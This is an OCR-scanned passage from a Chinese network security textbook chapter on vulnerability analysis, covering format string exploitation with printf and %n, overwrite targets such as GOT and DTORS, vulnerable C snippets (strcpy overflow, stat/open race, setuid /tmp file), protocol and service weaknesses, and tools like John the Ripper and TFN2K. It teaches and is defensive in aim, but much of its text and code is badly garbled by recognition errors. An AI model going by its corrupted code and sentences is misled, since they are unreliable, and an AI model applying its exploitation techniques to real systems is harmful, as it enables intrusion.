能 读 取 堆栈 中 的 任意 数据 。 如 果 在 第 (2) 步 中 ,AP 指示 的 是 攻击 者 精心 构造 的 地 址 信息 ， 
攻击 者 就 能 读 取 他 想 要 读 取 的 任意 地 址 中 的 信息 。 也 就 是 说 ,如 果 攻 击 者 能 够 提供 格式 串 ， 
怠 能 控制 困 数 的 功能 ,从 而 引起 安全 问题 。 例 如 ,void f(char * buffer) { printf(buffer) ; }” 
中 ,如 果 buffer 可 以 由 用 户 控 制 就 会 导致 格式 化 串 漏 洞 , 不 存在 此 漏洞 的 代码 为 "void f 
(char * buffer) ( printfC" Vos" ,buffer) ; 1", 

格式 串 来 源 不 可 信 ,、 格 式 串 包含 可 对 内 存 进行 读 写 的 格式 符 ,格式 串 水 数 不 检 查 参 数 的 
类 型 和 个 数 是 产生 格式 串 漏 洞 的 根本 原因 。 

在 格式 化 函数 中 ,“%x” 以 十 六 进 制 的 形式 输出 堆栈 的 内 容 ,%s 可 以 输出 对 应 地 址 所 
指 癌 的 字符 串 ,但 C 语言 没有 机 制 去 检查 是 否 真 的 有 对 应 的 变量 存在 ,也 不 管 对 应 的 变量 
地 址 是 用 户 数 据 还 是 系统 数据 。 利 用 该 脆弱 性 ,攻击 者 如 果 能 够 构造 格式 串 ,就 能 实现 读 内 
存 任意 地 址 的 目的 。 

在 下 面 所 示 的 代码 中 , 当 没 有 给 printf() 函 数 的 格式 化 串 提 供 足 够 的 对 应 参数 时 ， 
printf() 并 没有 报错 ,而 是 把 内 存 中 某 4 个 字 节 的 内 容 打 印 了 出 来 ,这 4 个 字 节 的 内 容 是 
74736574。 由 于 字符 串 在 内 存 中 是 以 反 序 排列 的 ,74736574 对 应 的 实际 字符 串 应 该 是 test, 


# include 

int main(void) 

{ 

int 1=1,]=2,k= 3; 

char buf[] = "test"; 

peatl(" $s $d Xd %x\n', buf, 13); 
return 0; 


} 


Hh R : 


test 1 2 74736574 


这 个 程序 在 堆栈 中 的 情况 如 下 。 

(1) 调用 main() 函 数 之 前 首先 把 返回 地 址 压 栈 ，。 

(2) 然后 压 入 的 是 EBP, 并 把 ESP 复制 到 EBP. 

(3) 把 ESP 减 去 一 定 的 数量 ,也 就 是 把 堆栈 扩大 ,给 变量 1,j、k、buf 留 出 空间 。 

(4) 开始 调用 printf() ,把 printfO WY 3 个 参数 j i buf 和 格式 串 "%s “Md “Md %x\n" 依 
UR ACHE RE 

(5) FRA printf() 的 返回 地 址 。 

(60 EARTHY EBP. 


33 
第 3 章 ”系统 漏洞 分 析 及 相关 标 


(7) 开始 执行 printfO 。 

当 调 用 printf() 时 , 它 首 先 找 到 第 一 个 参数 格式 串 "%s Yd Yd 26 xNn" ,然后 就 开始 按 
照 对 应 关系 依次 打印 前 面 堆栈 中 的 内 容 ,%s 对 应 buf 地 址 ,也 就 打印 出 了 buf 的 内 容 , 第 
一 个 %d 对 应 1, 第 二 个 %d 对 应 j, Vo x 本 来 是 应 该 对 应 k 的 ,可 是 由 于 编程 者 提供 给 printf() 的 
SOPRA k.m j 前 面 正好 是 buf 内 容 , 因 此 就 把 buf 的 内 容 作 为 十 六 进 制 数 输出 了 ,也 就 
是 输出 中 看 到 的 74736574。 

另外 ,在 格式 化 串 中 ,可 以 包括 “%n” 等 写 内 存 的 格式 符 , 而 C 语言 没有 机 制 保证 要 写 
的 地 址 是 当前 进程 的 合法 地 址 。 利 用 该 脆弱 性 ,攻击 者 如 果 能 够 构造 格式 化 串 ,就 能 实现 写 
内 存 任意 地 址 的 目的 。%n 的 意义 是 将 其 之 前 的 格式 所 显示 内 容 的 长 度 输出 到 一 个 变量 中 。 
如 以 下 代码 所 示 , 整 型 变量 被 改写 为 0x14。 如 果 格 式 串 可 控 , 就 可 以 利用 这 个 特性 实现 在 
任意 地 址 中 写 任 意 内 容 。 


void main(void) 

{ 

int num = 0x41414141; 
printf("Before: num= % x\n", num); 
printf("% .20d% n\n", num, &num) ; 
printf("After: num= $ xxn", num); 


} 


4j rh OR : 


Before: num = 41414141 
00000000001094795585 
After: num = 14 


从 这 个 例子 中 可 以 得 出 这 样 的 结论 : 在 实际 利用 某 个 漏洞 时 ,并 不 是 直接 把 跳 苇 地 址 
号 人 轴 数 的 返回 地 址 单元 ,向 是 号 入 一 个 存放 看 铺 数 的 返回 地 址 的 地 址 中 ,也 就 是 说 并 不 下 
Fa mia [E] Hb hk ,而 是 通过 地 址 来 间接 地 改写 返回 地 址 。 

从 上 面 两 个 示例 可 知 ,利用 提交 格式 串 来 访问 格式 串 前 面 堆栈 里 的 内 容 , 并 且 利 
用 %an 可 以 癌 一 个 内 存单 元 中 的 地 址 写 和 人 一 个 值 ,既然 可 以 访问 到 提交 的 字符 串 , 就 可 以 
在 提交 的 字符 串 中 放 上 某 个 函数 的 返回 地 址 的 地 址 ,这 样 就 可 以 利用 %n 来 改写 这 个 返 
回 地 址 。 

以 上 是 格式 串 漏洞 利用 的 简单 示例 ,还 有 其 他 一 些 更 为 复杂 的 漏洞 利用 。 和 总体 来 说 ,可 
将 格式 串 漏 洞 利 用 的 要 素 归 纳 如 下 。 

C) im ARASH Hl y HE. 

(2) Printf 参数 地 址 到 目 定 义 的 格式 串 数据 地 址 的 直接 地 址 。 

(3) 格式 串 数据 没有 4 字 节 对 齐 的 伺 移 。 

(4) Shellcode 地 址 , 

n] DA FARK 8 m RAS PE d B] HE VA P LAP 

(1) GOT 地 址 (函数 的 动态 重 定位 ) 。 

(2) exit 之 前 会 调用 的 DTORS 地 址 。 
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(3) 利用 C library hooks. 

(4) 利用 atexit 结构 。 

(5) 因数 指针 (如 C++ 程序 的 Vtablecall 和 back 等 ) 。 

(6) 堆栈 中 的 函数 返回 地 址 。 

(7) #2 m dl lookup versioned symbol, 

4. 内 核 漏 洞 利用 

V3 Ez AS iis Ted 4H EG H3 P ze d id » ,由 于 环境 和 机 制 的 不 同 , 寻 致 利 用 方式 上 存在 很 多 区 别 ， 
主要 有 以 下 几 点 : 一 是 目标 有 所 区 别 , 用 户 态 的 汤 洞 利用 通常 以 支持 控制 流 , 获 得 执行 权限 
为 主 ,而 内 核 态 的 漏洞 更 多 以 提升 本 地 用 户 权 限 为 目标 ; 二 是 动态 内 存 分 配 机 制 存在 区 别 ， 
用 户 态 使 用 堆 机 制 , 内 核 态 使 用 池 机 制 ,虽然 两 者 较为 类 似 , 但 是 内 核 池 机 制 更 为 复杂 ,利用 
起 来 也 更 加 困难 ; 三 是 所 处 环境 不 同 , 在 内 核 态 破坏 了 执行 环境 后 ,如 末 恢 复 不 当 , 后 来 远 
比 用 户 态 严重 。 


3.4 漏洞 分 析 方 回 


3.4.1 软件 漏洞 


计算 机 软件 的 缺陷 一 直 困 扰 着 软件 的 发 展 ,目前 还 没有 彻底 的 方法 解决 软件 缺陷 问题 。 
据 估 计 ,软件 程序 的 1000 行 代码 中 有 5 一 15 个 错误 。 然 而 ,对 于 软件 系统 的 功能 性 错误 容 
易 发 现 , 软 件 的 安全 性 缺陷 却 不 容易 发 现 。 例 如 ,一 个 电子 邮件 服务 需 软 件 实现 了 正 稼 的 发 
送 要 求 ,但 未 经 认证 ,允许 任何 人 使 用 该 服务 器 发 送 邮件 ,这 样 就 留 下 了 攻击 者 使 用 该 邮件 
服务 器 制造 垃圾 邮件 的 安全 隐患 。 

软件 的 安全 性 漏洞 的 发 现 方法 主要 还 是 依赖 于 人 工 干 预 , 典 型 方法 是 将 已 发 现 的 安全 
漏洞 进行 总 结 ,形成 一 个 漏洞 知识 经 验 库 ,然后 利用 该 漏洞 库 , 通 过 人 工 识别 或 程序 自动 识 
别 。 用 程序 自动 发 现 漏 洞 的 技术 主要 有 词法 分 析 、 模 型 检查 、 状 态 机 检查 、 故 障 注入 (Fault 
Injection) 、 自 动 定理 证 明 , 源 程序 安全 漏洞 自动 发 现 工具 如 表 3-1 Bron. 

表 3-1 源 程序 安全 漏洞 自动 发 现 工具 





工具 名称 简要 描述 

Flawfinder 利用 词法 分 析 技 术 发 现 以 C 语言 编写 的 源 程序 安全 漏洞 
Splint 检查 以 CaaS HERS ei 

ITS4 检查 以 C 和 C++ 语言 编写 的 源 程 序 安全 漏洞 

Grep 自 定 义 漏 洞 模式 ,检查 任意 源 程序 安全 漏洞 

MOPS 利用 状态 机 技术 来 分 析 以 C 语言 编写 的 源 程序 安全 漏洞 
boon 检查 缓冲 区 海 出 漏洞 


典型 的 软件 漏洞 类 型 主要 包括 以 下 几 种 。 

(1) 程序 中 缓 神 区 不 做 边界 检查 , 容 钨 造成 组 冲 区 次 出 安全 缺陷 , 奉 程序 中 使 用 了 不 安 
全 的 冰 数 ,就 存在 安全 缺陷 ,攻击 痢 可 以 利用 这 个 缺陷 攻 击 该 程序 。 如 下 代码 给 出 了 一 个 存 
在 缓冲 区 海 出 的 源 程 序 代 码 , 在 该 程序 中 ,调用 复制 图 数 strcpy() 之 前 ,未 对 输入 参数 字符 
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串 的 长 度 进行 检查 。 表 3-2 给 出 了 造成 缓冲 区 溢出 的 非 安 全 函数 与 防止 溢出 的 安全 函数 对 
照 表 。 


main(int ac,char *av[ ]) 
{ p(av[1]); 
} 
void p(char * a) 
{ char b[30]; 
strcpy(b,a); 
} 


X32 非 安全 函数 与 安全 函数 对 昭 
不 安全 程序 使 用 的 函数 | ”安全 程序 使 用 的 函数 “| 不 安全 程序 使 用 的 函数 | ”安全 程序 使 用 的 函数 


(2) 程序 的 系统 调用 不 当 ,造成 安全 缺陷 。 
如 以 下 代码 所 示 ,unsafeopen() 困 数 使 用 系统 调用 stat() . 5 be X FE UI IR] y& BAF (File 








Race Conditions) 安 全 缺陷 。 该 图 数 的 功能 如 下 。 


第 一 步 , 检 查 所 使 用 文件 的 权限 属性 和 状态 。 
第 二 步 ,对 文件 进行 操作 。 
代码 安全 问题 产生 于 第 一 步 到 种 二 此 执行 之 间 ,攻击 者 对 文件 进行 操作 控制 ,使 文件 的 


权限 属性 和 状态 检查 成 功 , 而 实际 操作 的 文件 则 是 万 外 一 个 。 


int unsafeopen(char * filename) 
{ struct stat st; 

int fd; 

/* 获取 文件 状态 信息 * / 

if (stat(filename, &st) != 0) 
return — 1; 

/* 检测 文件 属 主 是 否 是 rootx / 

if (st.st uid != 0) 
return — 1; 

fd = open(filename, O RDWR, 0); 

if (fd « 0) 
return — 1; 

return fd; 


(3) FEJT RARE P A Ss FA ASTU EAE, W L FARI Aras . maketemp O phi Zit AY T Bé 


是 在 tmp 目录 下 创建 tempfile。 假 如 攻击 者 事先 已 创建 文件 /tmp/tempfile,; 而 且 该 文件 是 
sh。 则 程序 运行 时 ,由 于 文件 已 存在 ,无 法 创建 ,程序 继续 执行 ,将 文件 改 为 root 拥有 ,这 样 
就 给 攻击 者 一 个 setuid root shell, 从 而 攻击 者 就 具有 超级 用 户 访 问 权 限 。 
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char maketemp( ) 

{ 
char * name = "/tmp/tempfile"; 
create(name, 0644); 
chown(name, 0, 0); 
return name; 


} 


(4) 程序 随意 接收 外 部 输入 , 且 对 输入 数据 不 做 安全 检查 ,或 者 数据 输入 安全 检查 不 完 
备 。CGI 程序 存在 这 样 的 安全 缺陷 。 如 以 下 代码 中 给 出 一 个 有 安全 漏洞 的 CGI 程序 实例 ， 
此 程序 只 能 检查 变量 QUERY STRING 已 知 的 威胁 字符 串 ,但 是 无 法 检测 未 知 的 威胁 字符 
FR ,因此 存在 安全 隐患 。 


# define BAD "/ ;[]«» &\t" 

char * query() 

{ char * user data, * cp; 
/* 获取 数据 */ 
user data = getenv( "QUERY STRING"); 
/* ERA RSF x / 
for (cp = user data; * (cp += strcspn(cp, BAD)); ) 

ee 

return user data; 


} 


(5) 程序 运行 时 的 计算 资源 无 限制 或 消耗 资源 过 多 ,造成 拒绝 服务 攻击 缺陷 。 程 厅 运 
行 时 ,需要 一 定 的 计算 资源 ,如 磁盘 、 内 存 、 网 络 币 宽 等 ,但 是 如 果 程 序 中 未 对 计算 资源 进行 
限制 ,就 会 留 下 安全 隐患 。 例 如 ,程序 中 动态 申请 的 内 存 使 用 完毕 后 ,不 释放 ,进而 导致 计算 
机 内 存 资 源 消 耗 过 多 ,造成 死机 或 使 程序 无 法 运行 。 

(6) 程序 执行 的 中 间 结 果 处 理 不 当 , 形 成 安全 隐患 。 程 序 代 码 执行 时 所 产生 的 临时 文 
件 不 做 安全 人 处理 ,允许 任何 人 读 写 。 例 如 ,数据 加 密 产 生 的 临时 文件 可 以 让 任何 人 读 写 ,从 
而 引起 加 密 信 息 汇 种。 

(7) 程序 应 用 蚤 的 加 密 算 法 。 加 密 程 序 中 使 用 弱 的 加 密 算 法 或 随机 晒 数 ,如 早期 
Netscape 的 安全 问题 就 是 因为 随机 数 而 引起 的 。 

(8) 程序 代码 对 敏感 数据 的 传送 不 做 保密 人 处理。 程序 中 的 数据 如 果 不 做 安全 保护 , 则 
容易 造成 敏感 信息 泄露 。 例 如 ,Telnet ftp, POP3 等 客户 和 服务 程序 ,直接 在 网 络 上 传递 用 
户 名 和 密码 口令 ,容易 造成 信息 泄露 。 


3.4.2 通信 协议 漏洞 


网 络 通信 协议 的 安全 性 是 实现 网 络 数 据 安 全 传送 的 保障 。 例 如 ,由 于 以 太 网 协议 是 基 

共享 信道 广播 通信 ,容易 造成 广播 风 其 或 港 霹 信息。 现在 ,大 多 数 网 络 唱 探 疾 都 利用 以 太 
Maus x ^P dir ib] . 53 HU) ib P 26 ROB fei fei ss s BI fei UNDC Di led AL P1] 12: 388 27 TR A VA. P ULTRI, 

(1) 是 否 可 以 伪造 通信 协议 数据 包 的 发 送 地 址 ? 

(2) 是 否 可 以 修改 通信 协议 的 数据 包 ? 
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(3) 是 否 可 以 截获 通信 协议 的 数据 包 ? 

(4) 是 否 可 以 寻找 通信 协议 的 加 蜜 算法 弱点 , 徊 取 人 繁 感 信息 ? 

(5) 是 否 可 以 构造 通信 协议 的 异常 数据 包 发 送 ,消耗 网 络 资源 市 宽 ? 

(6) 是 否 可 以 制作 虚假 的 通信 协议 请 求 ,占用 协议 主体 的 大 量 计算 资源 ? 

(7) 是 否 可 以 破解 通信 协议 的 弱 认 证 算法 ,拦截 通信 会 话 ? 

(8) 是 否 可 以 破坏 通信 协议 的 运行 , 重 定 问 协 议 数 据 包 传送 ? 

(9) 是 否 可 以 利用 通信 协议 搜集 攻击 目标 信息 ? 

通信 协议 安全 漏洞 分 析 工 具有 许多 ,目前 主要 针对 TCP/IP 协议 得 ,如 表 3-3 所 示 。 


表 3-3 协议 安全 测试 工具 


L H H x& dü xh 

Dsniff 分 析 获 取 应 用 协议 口令 

Ethereal 图 形 化 网 络 协 议 分 析 工 具 , 可 分 析 网 络 通信 数据 
TCPDump UNIX/Linux 平台 网 络 协议 分 析 工 具 

Windump Windows 平台 网 络 协 议 分 析 工 具 

ip6sic IPv6 协议 栈 压 力 测试 工具 

ISIC TCP/IP 协议 栈 稳定 性 测试 工具 


(D TCP/IP 协议 漏洞 挖掘 。TCP/P 协议 是 Internet 网 络 运行 的 核心 协议 ,TCP/IP 
协议 的 漏洞 包括 : IP 数据 包 的 源 地 址 可 更 改 , 攻 击 者 利用 其 弦 点 掩盖 真实 身份 ; 攻击 者 篆 
问 服务 大 发 送 大 量 请 求 包 ,消耗 网 络 融 宽 资源 ,实现 拒绝 服务 攻击 。TCP 序列 号 空间 有 限 ， 
Wik A A Dy Fea iil. HEMT DAR TCP 会 话 连接 ; 利用 通信 协议 ,构建 网 络 隐蔽 通道 ; TCP/IP f£ 
TK AY BE A MS. Hy HES HT A AE ht OP BT. 

(2) 网 络 共 享 协议 漏洞 挖掘。 网 络 共享 协议 是 Windows 操作 系统 用 于 文件 和 打印 机 
HY FE SE DIM ,常见 的 漏洞 挖掘 方法 如 下 。 

O 共享 目录 谈 写 权限 过 大 。 人 允许 任何 用 户 谈 写 目录 ,特别 是 系统 目录 随意 可 与 。 

© 敏感 信息 泄露 。 人 允许 Windows 文件 共享 的 机 制 可 被 攻击 者 利用 ,获取 系统 的 敏感 
信息 。 通 过 与 目标 主机 建立 一 个 “ 空 对 话 ”NetBIOS 连接 ,就 可 以 获得 用 户 和 组 信息 (用 户 
A EVES A] LO SOR MR RAS 信息 ) 系统 信息 和 某 种 注册 密 钥 信 息 。 这 些 信 息 对 攻击 
者 很 有 帮助 ,因为 这 些 信息 可 以 帮助 攻击 者 进行 口令 猜测 和 破解 。 


3.4.3 操作 系统 典型 漏洞 


操作 系统 是 计算 机 资源 的 直接 管理 者 ,可 以 说 操作 系统 的 安全 是 整个 计算 机 系统 安全 
的 基础 。 没 有 操作 系统 的 安全 ,就 不 可 能 真正 解决 数据 库 安全 、 网 络 安全 和 其 他 应 用 软件 的 
安全 问题 。 没 有 安全 的 操作 系统 做 基础 ,其 他 的 安全 技术 就 难以 发 挥 效 力 。 现 在 应 用 最 广 
iz HJ Windows 操作 系统 存在 很 多 安全 汤 洞 。 

与 软件 的 安全 性 漏洞 相 比较 ,操作 系统 漏洞 的 发 现 方法 是 多 个 技术 方法 的 综合 ,典型 方 
法 归纳 如 下 。 

CD 利用 操作 系统 的 广 商 提供 用 户 手 册 和 技术 文档 ,发 现 操 作 系 统 的 安全 漏洞 。 例 如 ， 
操作 系统 的 默认 用 户 名 和 口令 ,紧急 修复 系统 是 否 可 以 绕 过 操作 系统 的 安全 机 制 。 


38 


吕 I 络 攻防 原理 及 应 用 





(2) 利用 操作 系统 提供 的 额外 功能 ,改变 操作 系统 的 内 核 功 能 。 例 如 ,UNIX/Linux F 
用 LKM, Windows 系统 动态 链接 库 (DLL) 等 成 为 日 前 Rootkit 进行 攻击 的 切入 点 。 

(3) 利用 操作 系统 提供 的 调试 和 跟 踩 机制, 发现 操作 系统 软件 模块 的 依赖 关系 ,进而 确 
定 有 安全 漏洞 调用 ,如 UNIX/Linux 的 有 效 UID 问题 。 

CA) 利用 协议 分 析 融 ,分 析 操 作 系 统 与 其 他 系统 的 交互 过 程 , 以 发 现 操作 系统 中 协议 实 
现 安全 隐患 ,如 Windows 认证 协议 LAN, 

(5) 利用 反 编 详 工 具 ,分析 操 作 系 统 的 二 进 制 代 码 , 从 而 发 现 操作 系统 程序 处 理 过 程 中 
的 安全 漏洞 。 典 型 软件 程序 安全 漏洞 发 现 工 具 如 表 3-4 所 示 。 


表 3-4 典型 软件 程序 安全 漏洞 发 现 工具 


Crack 是 一 个 密码 猜测 工具 ,用 于 发 现 
UNIX 系统 中 的 弱 口 令 用 户 

John the Ripper 是 一 个 快速 的 口令 破解 工 
具 , 能 用 于 多 个 平台 

一 个 用 于 Windows 平台 的 口令 破解 工具 ， 
用 于 发 现 Windows AS FN OSAP 


Crack 5 http://www. crypticide. org/users/alecm/ 






John the Ripper | http://www. openwall. com/john/ 


Lopht Crack http://www. securityfocus. com/ tools/1005 


前 见 操作 系统 中 的 安全 漏洞 包括 以 下 内 容 。 

(1) 操作 系统 软件 程序 汤 洞 ,网 络 攻 击 痢 党 第 寻找 操作 系统 特权 有 绥 冲 区 洪 出 的 程序 ， 
借助 这 些 程序 将 普通 用 户 权限 提升 或 获得 访问 系统 的 特权 。 

(2) 操作 系统 配置 漏洞 。 即 使 是 安全 的 操作 系统 ,如 末 配 置 不 当 , 也 容易 产生 安全 源 
洞 。 在 当前 操作 系统 安全 配置 中 ,典型 漏洞 主要 有 以 下 几 种 。 

D 文件 权限 设置 。 例 如 ,UNIX/Linux 中 的 shadow 文件 设置 ,以 及 网 站 中 cgi 程序 的 
权限 设置 等 。 

© 主机 之 间 信 任 关 系 。 例 如 ,UNIX/Linux 中 的 rhost 文件 设置 。 

Q 开放 有 漏洞 的 网 络 服务 。 例 如 ,UNIX7VLinux 中 的 sendmail 服务 、R 命令 服务 、 
Windows A Ze HY BRA SEER . 空 会 话 连接 等 。 

D 安装 操作 系统 时 ,保留 默认 的 口令 和 用 户 账号 。 例 如 ,UNIXVLinux 中 的 root 账户 、 
Windows 系统 的 guest 账号 。 

(3) 操作 系统 的 安全 机 制 缺 陷 。 操 作 系 统 的 用 户 认 证 是 保护 合法 用 户 的 第 一 过 屏障 ， 
Hof BS ds i22 Dp. 

CD 保留 默认 账号 和 口令 。 在 没有 账号 和 口令 情况 下 ,可 以 以 单 用 户 模式 司 动 方式 进入 
Linux 系统 。 

Q 易 受 伪装 欺骗 的 认证 标识 。 某 些 操作 系统 以 IP 地 址 或 主机 名 作为 认证 依据 ,然而 
IP 地 址 或 主机 名 部 容易 伪造 ,攻击 痢 容易 骗 过 操作 系统 。 


3.4.4 应 用 服务 典型 漏洞 


应 用 服务 直接 面 回 用户 妆 ,一 个 应 用 服务 常 第 是 多 个 软件 或 系统 综合 协作 来 提供 , 因 
此 ,应 用 服务 的 安全 湄 洞 不 仅仅 表现 在 应 用 软件 本 号 ,而且 也 同 其 他 系统 交互 接口 尝 密 联 
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系 , 如 数据 库 系 统 .操作 系统 .用 户 认 证 系统 .应 用 编程 声言 .中 间 件 等 。 相 对 而 言 ,操作 系统 
的 安全 漏洞 目前 得 到 了 较为 充分 认识 ,但 是 应 用 服务 的 安全 漏洞 正 逐 渐 得 到 认同 。 

根据 所 擎 担 的 资料 ,应 用 服务 油 洞 的 典型 攻击 方法 有 以 下 几 种 。 

CD 利用 应 用 服务 的 厂商 提供 用 户 手 册 和 技术 文档 ,发现 应 用 服务 的 默认 用 户 和 口令 、 
远程 省 理 文 持 。 这 种 方法 技术 含量 比较 低 , 但 是 有 效 。 

(2) 利用 应 用 服务 的 安全 机 制 功能 不 完善 ,恶意 使 用 应 用 服务 提供 的 质 源 ,如 垃圾 邮件 
TUR o 

C30 RIEF oz A AR 5 te BR HJ 58 H EE TÉ EAA kB UR S TI A5 FE. BH SQL 注入 
攻击 。 

C4) 利用 应 用 服务 提供 的 额外 功能 ,越权 执行 操作 系统 命令 ,如 webshell。 

目前 ,针对 应 用 服务 狂 洞 发 现 的 工具 有 许多 ,和 典型 的 独 洞 发 掘 工具 如 表 3-5 Bron. 


R 3-5 应 用 服务 漏洞 发 掘 工具 


a H H x& ji x 
Dsniff 分 析 典 型 应 用 协议 中 口令 是 否 加 密 
Ethereal Ethereal 是 一 个 网 络 协议 分 析 工 具 。 分 析 网 络 数据 及 磁盘 上 的 文件 
Sniffit Sniffit 可 对 多 个 版 本 的 操作 系统 进行 监听 
Snort 一 个 轻 量 级 的 IDS, 也 可 对 多 个 操作 系统 进行 监听 


TCPDump  |Linux 中 强大 的 网 络 数据 采集 分 析 工 具 之 一 ,用 于 分 析 网 络 .排查 问题 
MielieTool 是 一 个 发 现 Web 应 用 弱点 的 工具 , 它 支 持 使 用 多 种 表单 和 铝 
程序 ,支持 多 个 站 点 的 检测 
TFN2K 是 指 通过 主 控 端 利用 大 量 代 理 问 主机 的 资源 对 一 个 或 多 个 目标 进行 协同 攻击 。 
当前 互联 网 中 的 UNIX Solaris 和 Windows NT 等 平台 的 主机 被 用 于 此 类 攻击 ,而 且 这 
个 工具 非常 容易 被 移植 到 其 他 系统 平台 上 ， 

TFN2K 由 两 部 分 组 成 : 在 主 控 端 主机 上 的 客户 端 和 在 代理 端 主机 上 的 守护 进程 。 主 摊 

TFNZK 跨 问 其 代理 端 发 送 攻 击 指 定 的 目标 主机 列表 。 代 理 端 据 此 对 目标 进行 拒绝 服务 攻击 。 
由 一 个 主 控 端 控制 的 多 个 代理 端 主机 ,能 够 在 攻击 过 程 中 相互 协同 ,保证 攻击 的 连 绪 性 。 
主 控 端 和 代理 端的 网 络 通信 是 经 过 加 密 的 ,还 可 能 混杂 了 许多 虚假 数据 包 。 整 个 
TFN2K 网 络 可 能 使 用 不 同 的 TCP、UDP 或 ICMP 包 进 行 通信 。 而 且 主 控 端 还 能 伪造 其 
IP 地 址 。 所 有 这 些 特性 都 导致 发 展 防 御 TFN2K 攻击 的 策略 和 技术 非常 困难 或 效率 很 低 
WebFuzzer 是 一 个 检测 Web 应 用 的 工具 ,用 于 发 现 服务 旨 问 潜在 的 危险 。 目 前 可 以 检 

WebFuzzer “| 测 的 弱点 包括 SQL 注入 、 跨 站 点 的 脚本 执行 、 远 问 代 码 执 行 、 文 件 泄露 、 目 录 裔 历 、.PHP 
包含 ,以 及 非 安 全 的 perl 脚本 open 调用 每 





pz 3 出 CGI 
MielieTool 接 来 检测 


利用 的 典型 应 用 服务 漏洞 包括 以 下 内 容 。 

(D 邮件 服务 系统 漏洞 挖掘。 电子 邮件 是 现代 社会 传递 消息 的 重要 工具 ,电子 邮件 的 
广泛 使 用 ,使 它 成 为 攻击 者 的 诈 选 目标 ,1988 F,“ Je Hr” ia E FET AH sendmail FY) da thal SF 
臻 攻击 成 功 。NIMDA 病毒 也 通过 邮件 传播 。 邮 件 攻 击 成 为 渗透 内 部 网 络 系统 的 重要 
Jrik. 

邮件 服务 系统 源 洞 可 归纳 为 : 邮件 用 户 账号 的 弦 口 令 ; 用 户 邮 件 存 人 笃 空 间 大 小 没有 限 
制 ; 邮件 服务 需 泄 露 用 户 账 号 信息 ; 邮件 服务 右 人 允许 随意 转发 ; 邮件 服务 融 的 中 继 没 有 限 
制 ; 邮件 服务 融 没 有 过 小 功能 ; 邮件 服务 兹 无 法 完全 识别 恶意 数据 ; 发 送 邮 件 地 址 无 须 确 
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TA; 邮件 服务 器 编程 漏洞 ; 邮件 明文 传输 ,未 经 加 密 处 理 ; 发 送 邮件 人 身份 无 须 验证 和 授 
权 ; 邮件 客户 程序 的 非 安 全 触发 机 制 。 

(2) 万 维 网 服务 需 漏 洞 挖掘 。WWW 服务 应 用 很 广 , 许 多 重要 的 应 用 业务 ,如 网 络 银 
行 、. 新 闻 发 布 等 都 基于 万 维 网 服务 ,其 安全 性 变 得 日 益 重 要 。 万 维 网 服务 币 见 的 漏洞 类 型 
A: WWW 服务 用 户 的 弱 口 令 ; SERS CGI 程序 ; 非 安 全 服务 配置 ,导致 敏感 信息 泄露; 
WWW 服务 认证 缺陷 ; WWW 服务 应 用 编程 语言 漏洞 ,如 Java, JavaScript, Perl 和 PHP 
语言 

(3) FTP 服务 漏洞 挖掘 。FTP 服务 是 网 络 应 用 的 重要 组 成 部 分 ,许多 网 站 提供 此 项 服 
务 ,方便 网 络 用 户 下 载 或 上 传 文件 。 有 些 网 站 在 FTP 服务 器 建立 incoming 目录 ,特意 允许 
用 户 拥 有 可 写 权 利 。 然 而 ,网 络 攻 击 者 常常 从 FTP 服务 器 上 寻找 漏洞 ,通过 FTP IRS #8 
击 网 络 系统 。 目 前 ,FTP 服务 需 漏 洞 类 型 主要 有 : FTP 服务 器 目录 权限 配置 不 当 ; FTP 服 
务 絮 泄露 用 户 信 息 。 例 如 ,通过 和 癌 远 程 FTP IRS ah ek ,就 可 以 判断 FTP 服务 需 运 行 何 种 
操作 系统 类 型 ,FTP 命令 可 以 强迫 某 些 FTP 服务 器 为 攻击 者 连接 目标 主机 ,使 攻击 者 可 以 
利用 目标 的 网 络 资源 扫 摘 内 部 网 络 主机 ,并 且 掩 盖 攻 击 者 的 来 源 , 使 安全 管理 员 误 认为 攻击 
KAAR. FTP 服务 带 存 人 备 容 量 无 限制 。 假 如 FTP 服务 六 未 对 incoming 目录 的 存储 
空间 进行 限制 , 则 攻击 者 可 以 在 该 目录 存放 垃圾 文件 ,消耗 磁盘 空间 ,从 而 造成 拒绝 服务 攻 
ik; FTP 服务 需 通 信 连 接 无 限制 。 网 络 攻击 者 通过 与 FTP 服务 需 建 立 大 量 请 求 连接 ,可 以 
阻止 正常 用 户 获 得 FTP 服务; FTP 协议 通过 明文 传输 数据 ; FTP 服务 程序 安全 缺陷 ,导致 
缓冲 区 溢出 。 

(4) 域名 服务 漏洞 挖掘 。 域 名 服务 系统 是 Internet 重要 的 网 络 基础 服务 ,域名 系统 是 
一 个 分 布 式 数 据 解析 系统 ,负责 主机 名 称 和 IP 地址 之 间 的 相互 解释 及 电子 邮件 的 路 由 。 由 
T IP 地址 不 便于 记忆 ,通常 人 们 去 访问 某 个 网 站 时 ,只 记 住 网 站 域名 。 例 如 ,域名 服务 就 是 
“网 络 空间 ”导航 需 ,一 旦 域名 服务 需 受 到 破坏 ,网 络 用 户 就 难以 访问 网 络 。 和 见 的 域名 服务 
漏洞 包括 域名 其 统 、 网 络 信 息 泄 露 . 服 务 需 拒绝 服务 .域名 服务 硕 的 数据 修改 或 破坏 。 

CD 域名 欺骗, 即 DNS 通过 客户 /服务 硕 方 式 提 供 域 名 解析 服务 ,但 查询 着 不 易 验 证 请 
求 回 答 信息 的 真实 性 和 有 效 性 。 攻 击 者 设法 构造 虚假 的 应 答 报 文 , 将 网 络 用 户 导 回 攻 击 者 
所 控制 的 站 点 ,为 用 户 提供 虚假 的 网 页 ,或 者 搜集 用 户 的 敏感 数据 ,如 邮件 和 网 络 银行 账号 。 

网 络 信息 泄露 ,域名 服务 器 存储 大 量 的 网 络 信 息 , 如 IP 地址 分 配 、 主 机 操作 系统 信 
E, .重要 网 络 服务 需 名 称 等 。 假 如 域名 服务 需 人 允许 区 域 信 息 传 递 ,就 等 于 为 攻击 者 提供 了 
“目标 网 络 结构 地 图 ”。 

O 服务 器 拒绝 服务 ,域名 服务 器 是 Internet 网 络 运行 的 基础 服务 , 某 个 单位 的 域名 受 
到 破坏 , 则 大 部 分 网 络 用 户 就 无 法 获得 该 单位 提供 的 服务 。 当 然 , 本 单位 的 网 络 用 户 也 无 法 
正常 与 外 部 网 络 通信 。 例 如 ,域名 服务 需 配 置 成 允许 接收 或 转发 外 部 的 DNS 查询 ,网 络 攻 
击 者 将 某 个 域名 请 求 的 通信 流量 放大 ,就 可 以 实施 域名 服务 器 拒绝 服务 攻击 。 这 种 攻击 称 
为 DNS Smurf 攻击 。 

域名 服务 需 的 数据 修改 或 破坏 ,网络 攻击 者 如 果 能 控制 域名 服务 硕 的 数据 ,修改 特定 的 
